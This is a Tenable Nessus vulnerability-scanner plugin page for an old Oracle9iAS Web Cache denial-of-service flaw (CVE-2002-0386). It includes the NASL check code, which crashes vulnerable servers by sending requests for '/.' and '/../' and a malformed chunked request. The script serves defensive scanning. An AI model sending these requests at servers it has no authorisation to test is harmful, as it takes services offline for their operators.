Lucene search

K
nessusThis script is Copyright (C) 2002-2022 Tenable Network Security, Inc.ORACLE9IAS_SLASHDOT_DOS.NASL
HistoryAug 14, 2002 - 12:00 a.m.

Oracle Web Cache Admin Module Multiple GET Request Method DoS

2002-08-1400:00:00
This script is Copyright (C) 2002-2022 Tenable Network Security, Inc.
www.tenable.com
9

It was possible to kill the web server by requesting ‘/.’ or ‘/…/’, or sending an invalid request using chunked content encoding. An attacker may exploit this vulnerability to crash the web server.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
#      Erik Anderson <[email protected]>
#      Added BugtraqID
#
# References:
# Date:  Thu, 18 Oct 2001 16:16:20 +0200
# From: "andreas junestam" <[email protected]>
# Affiliation: Defcom
# To: "bugtraq" <[email protected]>
# Subject: def-2001-30
#
# From: "@stake advisories" <[email protected]>
# To: [email protected]
# Date: Mon, 28 Oct 2002 13:30:54 -0500
# Subject: Oracle9iAS Web Cache Denial of Service (a102802-1)
#
# http://www.atstake.com/research/advisories/2002/a102802-1.txt
# http://otn.oracle.com/deploy/security/pdf/2002alert43rev1.pdf
#
# Affected:
# Oracle9iAS Web Cache/2.0.0.1.0
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(11076);
  script_version("1.25");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2002-0386");
  script_bugtraq_id(3765, 5902);

  script_name(english:"Oracle Web Cache Admin Module Multiple GET Request Method DoS");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server appears to be affected by a denial of
service condition.");
  script_set_attribute(attribute:"description", value:
"It was possible to kill the web server by requesting '/.' or 
'/../', or sending an invalid request using chunked content 
encoding. An attacker may exploit this vulnerability to crash
the web server.");
  script_set_attribute(attribute:"see_also", value:"http://www.oracle.com/technology/deploy/security/pdf/2002alert43rev1.pdf");
  script_set_attribute(attribute:"solution", value:
"upgrade your software or protect it with a filtering reverse proxy");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2002/10/04");
  script_set_attribute(attribute:"plugin_publication_date", value:"2002/08/14");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:application_server");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_DENIAL);
  script_family(english:"Databases");

  script_copyright(english:"This script is Copyright (C) 2002-2022 Tenable Network Security, Inc.");

  script_dependencies("find_service1.nasl", "httpver.nasl", "http_version.nasl");
  script_require_ports("Services/www", 4000);

  exit(0);
}

########

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

function check(port)
{
  local_var	w;
  local_var 	banner;

 if (http_is_dead(port: port)) return;
 banner = get_http_banner(port:port);
 if ( ! banner || "OracleAS-Web-Cache" >!< banner ) return;

 # The advisory says "GET /. HTTP/1.0" - however this won't get
 # past some transparent proxies, so it's better to use http_get()
 
 w = http_send_recv3(method:"GET",port: port, item: "/.");
 w = http_send_recv3(method:"GET", port: port, item: "/../");
 w = http_send_recv3(method:"GET", port: port, item: "/", 
   add_headers: make_array("Transfer-Encoding", "chunked"));
 sleep(1); # Is it really necessary ?
 if(http_is_dead(port:port))security_warning(port);
 return;
}

ports = add_port_in_list(list:get_kb_list("Services/www"), port:4000);
foreach port (ports) check(port: port);

VendorProductVersionCPE
oracleapplication_servercpe:/a:oracle:application_server
Related for ORACLE9IAS_SLASHDOT_DOS.NASL